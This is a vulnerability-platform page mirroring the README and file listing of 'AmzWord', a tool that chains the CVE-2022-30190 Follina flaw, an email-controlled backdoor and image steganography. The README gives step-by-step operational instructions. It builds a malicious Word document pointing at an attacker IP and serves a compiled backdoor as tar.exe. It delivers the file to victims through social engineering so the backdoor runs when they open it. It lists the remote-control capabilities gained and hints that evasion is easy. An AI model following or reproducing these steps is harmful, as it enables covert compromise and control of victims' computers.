漏洞平台

POC详情： 859036afc71a54fe4933169e7ebf57f39bf7f813

来源

https://github.com/Jump-Wang-111/AmzWord

关联漏洞

标题： Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述：Microsoft Windows Support Diagnostic Tool是美国微软（Microsoft）公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows

描述

An automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography.

介绍

# AmzWord

an automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography

Thanks to the following github repository, we referenced and modified part of the code to integrate and implement our work:

- [gdog](https://github.com/maldevel/gdog)
- [follina](https://github.com/Noxtal/follina)
- [virtual-reality](https://github.com/rokups/virtual-reality)

中文README[请看这里](https://github.com/Jump-Wang-111/AmzWord/blob/master/README_zh.md)

# Requirements

gdog：

- Python 2.7
- PyCrypto module
- WMI module
- Enum34 module
- Netifaces module

follina：

- Python 3.x

# Usage & attack process

1. Use follina.py to build a malicious word file and turn on http listening

   - You can change the default name and default ip in the code
   - You can also use `--ip` and `--output` to specify
   - Please refer to [follina](https://github.com/Noxtal/follina) for detailed usage. We have not changed the usage interface.
   - eg: `python follina.py --ip 100.100.100.100 --output maldoc.doc`

2. Modify client.py and gdog.py under gdog and fill in the following information

   ```python
   gmail_user = 'your email'
   gmail_pwd = 'your pwd'
   server = "smtp server"
   imap_server = 'imap server'
   ```

3. Compile client.py into tar.exe and place it under /follina/www

4. Use any social engineering method to send it to the target. As long as the victim opens word, tar.exe will be automatically downloaded and executed.

5. The attacker runs gdog locally and sends commands to control the target machine. For usage, see [gdog](https://github.com/maldevel/gdog)

# Remark

1. This is just a demo of the attack chain implementation. The running exe can even be found in the task manager, which makes it easy to observe the effect. We did not perform any operations such as anti-virus, hiding, and privilege escalation. Of course, these are not difficult on Windows, right?
2. The gdog project has been around for a long time, and we have spent a lot of effort to make it run successfully. The remote control commands that are currently confirmed include: executing commands, taking screenshots, pop-up windows, shutting down, locking the screen, and transferring files. These functions Sufficient to suit most needs.
3. I don’t know why, but there seems to be some problem with imap’s SUBJECT search. We cannot search for emails with the target subject, and the return value is empty. We can only take other methods, such as reading all unread emails, filtering out the targets, and then setting others as unread. This may cause problems when there are many controlled users and needs to be solved.
4. This project is only for learning and exchange purposes.

文件快照


 [4.0K]  /data/pocs/859036afc71a54fe4933169e7ebf57f39bf7f813
├── [4.0K]  follina
│   ├── [4.0K]  docx
│   │   ├── [1.3K]  [Content_Types].xml
│   │   ├── [4.0K]  docProps
│   │   │   ├── [ 703]  app.xml
│   │   │   └── [ 734]  core.xml
│   │   └── [4.0K]  word
│   │       ├── [3.8K]  document.xml
│   │       ├── [1.5K]  fontTable.xml
│   │       ├── [4.0K]  _rels
│   │       │   └── [ 969]  document.xml.rels
│   │       ├── [2.9K]  settings.xml
│   │       ├── [ 29K]  styles.xml
│   │       ├── [4.0K]  theme
│   │       │   └── [6.6K]  theme1.xml
│   │       └── [ 802]  webSettings.xml
│   ├── [3.6K]  follina.py
│   ├── [ 10K]  maldoc.doc
│   └── [4.0K]  www
│       └── [2.3M]  CC.png
├── [4.0K]  gdog
│   ├── [3.0M]  After_CC.png
│   ├── [2.1M]  After_Lyf.png
│   ├── [2.3M]  CC.png
│   ├── [4.0K]  client_exe
│   │   ├── [4.0K]  build
│   │   │   └── [4.0K]  client3
│   │   │       ├── [ 37K]  Analysis-00.toc
│   │   │       ├── [1.3K]  client3.exe.manifest
│   │   │       ├── [5.9K]  EXE-00.toc
│   │   │       ├── [ 10M]  PKG-00.pkg
│   │   │       ├── [4.6K]  PKG-00.toc
│   │   │       ├── [1.3M]  PYZ-00.pyz
│   │   │       ├── [ 33K]  PYZ-00.toc
│   │   │       ├── [3.6K]  warn-client3.txt
│   │   │       └── [272K]  xref-client3.html
│   │   └── [4.0K]  dist
│   │       ├── [3.0M]  After_CC.png
│   │       ├── [2.3M]  CC.png
│   │       ├── [ 10M]  client3.exe
│   │       ├── [2.1M]  image.png
│   │       └── [1.3K]  Information.txt
│   ├── [ 46K]  client.py
│   ├── [ 19K]  gdog.py
│   ├── [1.6M]  Lyf.png
│   ├── [ 79K]  png.py
│   ├── [  29]  requirements.txt
│   ├── [ 954]  shellcode_generate.py
│   └── [3.7K]  stega.py
├── [1.0K]  LICENSE
├── [2.7K]  README.md
└── [2.2K]  README_zh.md

12 directories, 40 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。